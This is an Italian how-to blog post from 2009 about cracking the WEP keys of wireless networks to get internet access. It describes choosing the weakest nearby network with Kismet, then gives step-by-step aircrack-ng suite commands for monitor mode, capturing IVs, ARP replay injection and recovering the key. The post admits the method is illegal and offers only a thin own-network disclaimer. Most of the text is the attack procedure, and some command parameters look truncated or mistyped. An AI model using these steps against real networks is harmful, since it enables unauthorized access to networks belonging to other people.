Come Scoprire Chiavi Wep per Reti Wireless
Pubblicato nel 2009 da emix83

Sep 12

La procedura che andremo a proporvi, permette con un pizzico di pazienza di scoprire le chiavi Wep per le reti Wireless da utilizzare per navigare su internet.
Ovviamente la procedura non è molto legale, quindi per questo noi la poniamo solo a scopo illustrativo da provare con la propria rete wireless a chiave Wep.
Questa procedura può essere eseguita con sistemi Linux installando idonei programmi che citeremo, oppure utilizzando direttamente BackTrack 3
Iniziamo!
1) Individuiamo un bersaglio, una rete da craccare
Per questa procedura dobbiamo individuare la rete più debole che sarà quella più facilmente attaccabile.
Questo può essere fato con il programma Kismet, installabile anche dai repository di ubuntu.
A questo punto ci verrà data la lista di tutte le reti che ha captato, ordiniamole con il tasto s e andiamo a scegliere la rete che ci interessa annotandoci i parametri importantissimi di SSID, BSSID, Channel, Encrypt, che ci serviranno successivamente.
2) Impostazione scheda di rete in monitor mode
Questa operazione si compie in tre passaggi:
- Eseguire il comando da terminale airmon-ng per individuare la scheda utilizzata;
- Eseguire airmon-ng stop eth0, se usate eth0;
- Rieseguite airmon-ng start eth0 11, dove 11 è il canale che troverete nel passaggio precedente;
3) Catturiamo il traffico
Per fare questo eseguiamo il comando, sempre da terminale, airodump-ng -c 11 -bssid 00:80:5A:47 –ivs -w wep eth0
Tutti i valori elencati qui sono ricavabili dai dati appuntati prima.
11=canale
bssid=lo trovate dal procedimento precedente
Aprendo un’altra shell digitiamo questa volta aireplay-ng -3 -b 00:80:5A:47 -h 00:13:Ce:C6 eth0
3=indica l’attacco dell’air request replay
b 00:80:5A:47 =Mac dell’access point
h 00:13:Ce:C6= lo ricavate da kismet
Il nostro Mac invece può essere catturato con ifconfig.
Fatto questo andiamo a catturae la Wep
Digitiamo sul terminale aircrack-ng -a 1 -b 00:80:5A:47 -n64 wep-01.ivs
1= proteocollo wep
n64=forza la ricerca sui 64 bit (se la chiave non venisse trovate togliete questo parametro)
A questo punto ci siamo dovremo leggere Key Found, ovvero chiave ottenuta.
Fonte HAckGeek

